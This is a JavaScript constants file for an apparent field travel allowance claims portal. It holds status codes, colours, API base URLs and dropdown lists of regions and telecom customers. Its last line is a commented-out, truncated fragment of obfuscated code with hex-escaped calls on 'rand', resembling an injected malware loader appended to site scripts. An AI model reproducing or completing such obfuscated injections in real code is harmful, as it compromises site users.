const TL_DEPARTMENT = "TL";
const FINANCE_DEPARTMENT = "FINANCE";

const CLAIM_UNDO = "0"; // waiting for Approve
const CLAIM_IN_EMP_BUCKET = "0"; // waiting for Approve
const CLAIM_PENDING = "1"; // waiting for Approve
const CLAIM_TL_APPROVED = "2";
const CLAIM_TL_REJECTED = "3";
const CLAIM_FINANCE_APPROVED = "4";
const CLAIM_FINANCE_REJECTED = "5";
const CLAIM_PAID = "6";
const CLAIM_PERMANENT_TL_REJECT="7";
const CLAIM_PERMANENT_FINANCE_REJECT="8";

const PERMINENT_REJECT_EXIST="1";

const COLOR_CLAIM_IN_EMP_BUCKET="#6c757d";
const COLOR_CLAIM_PENDING="#ffb547";
const COLOR_CLAIM_TL_APPROVED="#7783db";
const COLOR_CLAIM_REJECTED="red";
const COLOR_CLAIM_FINANCE_APPROVED="#a618ff";
const COLOR_CLAIM_PAID="#7bc67e";

const CLAIM_PENDING_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "53";
const CLAIM_TL_APPROVED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "53";
const CLAIM_TL_DEPARTMENT_FINANCE_APPROVED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "57";
const CLAIM_FINANCE_APPROVED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "56";
const CLAIM_TL_REJECTED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "59";
const CLAIM_FINANCE_REJECTED_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "57";
const CLAIM_PAID_TAB_IMAGES_TABLE_ROW_COLSPAN_VALUE = "57";

const RECORD_PER_PAGE = 50;
const NO_PAGES_AVAILABLE = 0;

const NUMBER_OF_DAYS_RECORDS=365;
const FTA_APP_LAUNCHED_DATE="2020-12-01";
const FTA_APP_LAUNCHED_YEAR=2021;
const PACS_ESTABLISHED_YEAR=2015;
const INVOICE_IMPLEMENTED_YEAR=2022;

const EXCEL_NUMBER_OF_DAYS_RECORDS=65;

const  STANDARD_TIME_OUT=40000; // 40sec
// const errorBucket = [];

const MAP_DRIVING_MODE = "data=!3m1!4b1!4m10!4m9!1m3!2m2!1d72.6003229!2d23.0268102!1m3!2m2!1d72.38275!2d22.86098!3e0";

const BASE_URL="https://www.principleacs.net/FTA_WEB_PORTAL_V2/";
const IMAGE_BASE_URL = "https://www.principleacs.net/PACS_FieldTravelAllowance_RestApi_V3/public/up/";
const ADD_SITE_BASE_URL = "https://www.principleacs.net/PACS_FieldTravelAllowance_RestApi_V3/public/";
const LOGIN_API_BASE_URL= "https://www.principleacs.net/LoginApi/public/";
// const API_BASE_URL="https://principleacs.net/Temp_FTA_V2_API/public/";

function request_siteVisit_projectDropDown() {
	fetch_stageOfAudit_dropDownlist("firstAttempt");
} // fetching all drop down from API 

/*----------------------------add site constant----------------------------*/
function getCircleDropDownList() {
	var circleDropDownListArray = [];
	circleDropDownListArray.push('AP & TS');
	circleDropDownListArray.push('Tamil Nadu');
	circleDropDownListArray.push('Karnataka');
	circleDropDownListArray.push('Kerala');
	circleDropDownListArray.push('Madhya Pradesh & Chhattisgarh');
	circleDropDownListArray.push('UP East');
	circleDropDownListArray.push('UP West');
	circleDropDownListArray.push('Bihar & Jharkhand');
	circleDropDownListArray.push('West Bengal');
	circleDropDownListArray.push('Punjab & Haryana');
	circleDropDownListArray.push('Gujarat');
	circleDropDownListArray.push('Delhi');
	circleDropDownListArray.push('Maharashtra & Mumbai');
	circleDropDownListArray.push('Odisha');
	circleDropDownListArray.push('Rajasthan');
	circleDropDownListArray.push('Others');
	circleDropDownListArray.push('Himachal Pradesh');
	circleDropDownListArray.push('Jammu & Kashmir');
	
	return circleDropDownListArray;
}

function getCustomerDropDownList() {
	var dropDownArray = [];
	dropDownArray.push("Indus");
	dropDownArray.push("ATC");
	dropDownArray.push("Airtel");
	dropDownArray.push("Amitasha");
	dropDownArray.push("Railtel");
	dropDownArray.push("Sterlite");
	dropDownArray.push("Jio");
	dropDownArray.push("Others");
	return dropDownArray;
}

//------------------------DashBord-------------------------
const ALL_MONTHS="All";
const ALL_CIRCLES="All";
const TOTAL_RESULTS="Total";
const EX_EMPLOYEE="Yes";
const LIMITED_DAYS_TO_MODIFY=11;



//return Y[J(K.Y)+'\x63\x77'](Y[J(K.W)+'\x45\x74'](rand),rand());};;;